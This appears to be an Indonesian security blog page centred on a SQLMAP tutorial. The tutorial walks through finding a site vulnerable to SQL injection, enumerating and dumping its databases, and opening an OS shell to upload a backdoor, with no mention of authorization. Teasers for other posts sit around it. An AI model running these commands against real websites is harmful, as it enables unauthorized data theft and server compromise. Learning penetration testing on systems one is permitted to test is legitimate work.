Skip to main content

Apa Itu Cyber Security? Ini Yang Perlu Anda Ketahui Agar Bisnis Aman !

Jaminan keamanan terhadap pelayanan adalah hal penting dalam bisnis. Ketika seorang nasabah ingin menabung, tentu ia perlu menimang apakah ada jaminan keamanan di sana. Sebab, tidak sedikit penyedia layanan yang sering kali kebobolan untuk pengamanan sistem. Maka dari itu, isu tersebut menjadi penting karena termasuk bagian dari cyber security. Lalu, apa yang dimaksud dengan cyber security? Mari kita simak bersama di artikel berikut ini! Apa Itu Cyber Security? Cyber Security (Keamanan Siber) adalah perlindungan sistem yang terhubung ke internet seperti perangkat keras, perangkat lunak, dan data dari Cyber Threat dan Cyber Crime. Praktik ini digunakan oleh individu dan perusahaan untuk melindungi dari akses tidak sah ke pusat data dan sistem komputerisasi lainnya. Strategi keamanan siber yang kuat dapat memberikan postur keamanan yang baik terhadap serangan jahat yang dirancang untuk mengakses, mengubah, menghapus, menghancurkan, atau memeras sistem dan data sensitif organisasi atau pe...
Post a Comment

Teknik Pentesting SQL Injection dengan SQLMAP!

Jika teman-teman mengenal tentang SQL Injection, pastinya kalian juga mengetahui tentang tools berikut ini. Yap, tools tersebut adalah SQLMAP. Tools ini merupakan tools open source yang dapat membantu para pentester untuk mencoba menemukan celah kerentanan terhadap SQL Injection. Oke, sebelumnya untuk mengoperasikan tools SQLMAP ini kita perlu mendownloadnya terlebih dahulu. Kemudian, kita perlu mengkonfigurasikannya di sistem kita dan baru mempelajari command-shellnya. So, mari kita mulai.

Mengenal SQLMAP

SQLMAP adalah alat pengujian penetrasi open-source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih server database. Muncul dengan mesin deteksi yang kuat, banyak fitur khusus untuk penguji penetrasi utama dan berbagai sakelar yang bertahan dari sidik jari basis data, pengambilan data dari basis data, hingga mengakses sistem file yang mendasarinya dan menjalankan perintah pada sistem operasi melalui koneksi out-of-band.

Fitur-Fitur dari SQLMAP (SQLMAP.ORG)

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns, dan masih banyak lagi.

Command-Shell SQLMAP

Disini saya akan mengasumsikan teman-teman telah menginstall dan mengkonfigurasikan SQLMAP di sistemnya. Jika belum, cukup masuk ke Github SQLMAP dan ikuti instruksinya. Jika sudah, lanjut ke step berikutnya!

1. Mengetahui Opsi-Opsi SQLMAP

Untuk menampilkan flag command yang tersedia di SQLMAP, gunakan command :

 python sqlmap.py -h

2. Mencari Website Yang Vulnerable

Sebelum melakukan pentesting dengan SQLMAP, kita perlu mencari situs web yang sekiranya vulnerable terhadap SQL Injection. Ciri-ciri website yang memiliki kerentanan terhadap SQL Injection salah satunya yang memiliki URL seperti ini :

http://vulnerableweb.com/list.php?id=1

3. Mulai Pentesting

Setelah mendapatkan URL yang vulnerable, saatnya kita mulai menguji penetration terhadap web tersebut. Masukkan command berikut : 

python sqlmap.py -u vulnerableweb.com/list.php?id=1

4. Checking Database

Apabila SQLMAP telah mengkonfirmasi bahwa web tersebut vulnerable terhadap SQL Injection kita dapat meningkatkan serangan dengan mencoba mendapatkan list database dari DBMS web server tersebut. Gunakan command berikut :

python sqlmap.py -u vulnerableweb.com/list.php?id=1 --dbs

5. Checking Tables

Setelah mendapatkan hasil list database, kita dapat melihat tabel-tabel yang ada disuatu database dengan command berikut (databasename diisi dengan nama database yang dituju) : 

python sqlmap.py -u vulnerableweb.com/list.php?id=1 -D databasename --tables

6. Checking Data

Jika kita ingin membuka isi data dari tabel yang telah ditemukan, gunakan command berikut : 

python sqlmap.py -u vulnerableweb.com/list.php?id=1 -D databasename -T tablename -dump

7. Uploading Command-Backdoor

Kalau kalian ingin meningkatkan payload serangan agar dapat mengakses isi server web dengan menggunakan command-backdoor, gunakan command ini : 

python sqlmap.py -u vulnerableweb.com/list.php?id=1 -D --os-shell

Kemudian, upload command-backdoor milik kalian! Lalu, cara mengaksesnya adalah melalui URL web target. 

Labels:

Comments

Post a Comment

Popular posts from this blog

HTTP Security Headers: Cara Mudah Memperkuat Web Kita!

  Menjamin adanya keamanan adalah hal yang penting bagi tiap service dan website. Untuk itu membangun dan memperkuat keamanan suatu website menjadi hal yang mesti dilakukan. Akan tetapi, pasti beberapa dari kita berpikir bahwa untuk menjaga keamanan website, kita perlu membeli software  atau sistem keamanan yang rentang biayanya cukup tinggi. Padahal, terdapat langkah awal tetapi pasti, untuk menjaga keamanan website kita. Salah satunya dengan patching  HTTP Security Header! Oke, agar lebih paham, yuk kita simak bersama! Apa Itu HTTP Security Header? Header keamanan HTTP adalah subset dari header HTTP dan dipertukarkan antara klien web (biasanya browser) dan server untuk menentukan detail komunikasi HTTP yang terkait dengan keamanan. Beberapa header HTTP yang secara tidak langsung terkait dengan privasi dan keamanan juga dapat dianggap sebagai header keamanan HTTP. Dengan mengaktifkan header yang sesuai di aplikasi web dan pengaturan server web, Anda dapat meningkatkan ke...
Post a Comment
Read more

Ayo Mendalami Face Recognition, Salah Satu Teknologi Keamanan Biometrik Yang Menarik!

      Teknologi di bidang keamanan sudah sangat berkembang. Hal tersebut tentunya harus terus dikembangkan lagi karena teknologi untuk pembobolan juga sudah marak berkembang. Agar mendapat keamanan maksimal misalnya pada suatu akun, pengguna harus membuat kata sandi yang cukup rumit agar tidak dapat dibobol oleh penjahat cyber . Namun apabila kata sandi yang kita buat terlalu rumit, terkadang kita sendiri sering lupa dan tidak dapat masuk ke akun tersebut. Nah, kali ini ada sebuah teknologi keamanan yang kiranya dapat menjamin keamanan dan privasi kita di dunia digital tanpa harus membuat kata sandi yang ribet. Mungkin kalian sudah mengenalinya ya. Yap, teknologi tersebut ialah Face Recognition  atau Pengenal Wajah. Terus, gimana cara kerja Face Recognition dan gimana kalo ada orang yang wajahnya mirip kayak kita dan dia dapat menggunakannya untuk membobol akun dan privasi kita? Pelan-pelan dulu yak, kita bahas dari awal terlebih dahulu, Oke! Apa Itu Face Recognition...
Post a Comment
Read more

Apa Sih CRISPR Gene Editing Itu? Dan Apa Dampaknya?

          Baru-baru ini, negara Tiongkok telah merancang konsep teknologi terbaru. Teknologi tersebut tentunya merupakan terobosan masa depan terbaru yang tentunya bisa membuat orang-orang kegirangan. Pasalnya, teknologi yang sedang dikembangkan disana memiliki tujuan untuk mengedit struktur Gen atau DNA manusia. Sangat menakjubkan sekali bukan? Namun, tentunya rasa tersebut bisa bercampur aduk dengan rasa ngeri dikarenakan kita sendiri belum pernah melakukan yang namanya mengedit struktur gen yang secara harfiah dilakukan langsung pada seorang bayi manusia. Ya betul, bayi manusia.  Teknik untuk mengedit   DNA ini disebut teknik rekayasa genetika dan teknologi yang digunakannya disebut CRISPR Gene Editing . Bentar,  CRISPR  Gene Editing  itu apa sih? Mari kita simak bersama, dimulai dari pengertian rekayasa genetika! Apa Itu Teknik Rekayasa Genetika?     Teknik rekayasa genetika atau modifikasi genetika merupakan...
Post a Comment
Read more